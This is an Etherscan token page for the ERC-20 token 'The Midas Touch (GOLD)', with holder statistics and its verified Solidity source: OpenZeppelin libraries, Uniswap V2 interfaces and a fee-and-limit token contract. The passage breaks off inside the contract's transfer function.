ETH Price: $3,464.65 (+1.46%)
Gas: 26 Gwei

Token

The Midas Touch (GOLD)
 

Overview

Max Total Supply

21,000,000,000 GOLD

Holders

80

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
atypicl.eth
Balance
162,230,255.587029262980330123 GOLD

Value
$0.00
0xb827ffc357883887bc7cc8b544f27835c31a39f4
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TheMidasTouch

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-14
*/

/**
                                                A NEW AGE AWAITS
                                        https://www.themidas.finance/
                                        https://twitter.com/TheMidasErc
                                        https://t.me/themidaserc
                                        https://medium.com/@themidaserc
*/

// SPDX-License-Identifier: MIT
pragma solidity 0.8.10 >=0.8.10 >=0.8.0 <0.9.0;
pragma experimental ABIEncoderV2;

////// lib/openzeppelin-contracts/contracts/utils/Context.sol
// OpenZeppelin Contracts v4.4.0 (utils/Context.sol)

/* pragma solidity ^0.8.0; */

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

////// lib/openzeppelin-contracts/contracts/access/Ownable.sol
// OpenZeppelin Contracts v4.4.0 (access/Ownable.sol)

/* pragma solidity ^0.8.0; */

/* import "../utils/Context.sol"; */

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol)

/* pragma solidity ^0.8.0; */

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol)

/* pragma solidity ^0.8.0; */

/* import "../IERC20.sol"; */

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol)

/* pragma solidity ^0.8.0; */

/* import "./IERC20.sol"; */
/* import "./extensions/IERC20Metadata.sol"; */
/* import "../../utils/Context.sol"; */

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol
// OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol)

/* pragma solidity ^0.8.0; */

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

////// src/IUniswapV2Factory.sol
/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

////// src/IUniswapV2Pair.sol
/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

////// src/IUniswapV2Router02.sol
/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

/* pragma solidity >=0.8.10; */

/* import {IUniswapV2Router02} from "./IUniswapV2Router02.sol"; */
/* import {IUniswapV2Factory} from "./IUniswapV2Factory.sol"; */
/* import {IUniswapV2Pair} from "./IUniswapV2Pair.sol"; */
/* import {IERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol"; */
/* import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol"; */
/* import {Ownable} from "lib/openzeppelin-contracts/contracts/access/Ownable.sol"; */
/* import {SafeMath} from "lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol"; */

contract TheMidasTouch is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
    address public constant deadAddress = address(0xdead);

    bool private swapping;

    address public marketingWallet;
    address public lpWallet;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    uint256 public aprRate;

    bool public limitsOnOff = true;
    bool public tradingActive = true;
    bool public swapEnabled = true;

    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;

    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;

    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;

    /******************/

    // exlcude from fees and max transaction amount
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(
        address indexed newAddress,
        address indexed oldAddress
    );

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20("The Midas Touch", "GOLD") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 1;
        uint256 _buyLiquidityFee = 1;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 1;
        uint256 _sellLiquidityFee = 1;
        uint256 _sellDevFee = 1;
        uint256 _aprRate = 161;
        lpWallet = owner();


        uint256 totalSupply = 21_000_000_000 * 1e18;

        maxTransactionAmount = totalSupply;
        maxWallet = (totalSupply * 2) / 100; // 2% from total supply maxWallet
        swapTokensAtAmount = (totalSupply * 3) / 1000;

        aprRate = _aprRate;
        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;

        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = address(0xA93894a3af64e62CE91DcE07Bf0670693129F836); // set as marketing wallet

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(marketingWallet), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {}

    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsOnOff = false;
        return true;
    }

    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }

    // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount)
        external
        onlyOwner
        returns (bool)
    {
        require(
            newAmount >= (totalSupply() * 1) / 100000,
            "Swap amount cannot be lower than 0.001% total supply."
        );
        require(
            newAmount <= (totalSupply() * 5) / 1000,
            "Swap amount cannot be higher than 0.5% total supply."
        );
        swapTokensAtAmount = newAmount;
        return true;
    }

    function updateMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1000) / 1e18,
            "Cannot set maxTransactionAmount lower than 0.1%"
        );
        maxTransactionAmount = newNum * (10**18);
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 5) / 1000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        maxWallet = newNum * (10**18);
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    // only use to disable contract sales if absolutely necessary (emergency use only)
    function updateSwapEnabled(bool enabled) external onlyOwner {
        swapEnabled = enabled;
    }

    function updateBuyFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 2, "Must keep fees at 2% or less");
    }

    function updateSellFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 6, "Must keep fees at 6% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(
            pair != uniswapV2Pair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet)
        external
        onlyOwner
    {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function getAprRate () public view returns (uint256) {
        return aprRate;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsOnOff) {
            if (
                from != marketingWallet &&
                to != marketingWallet &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
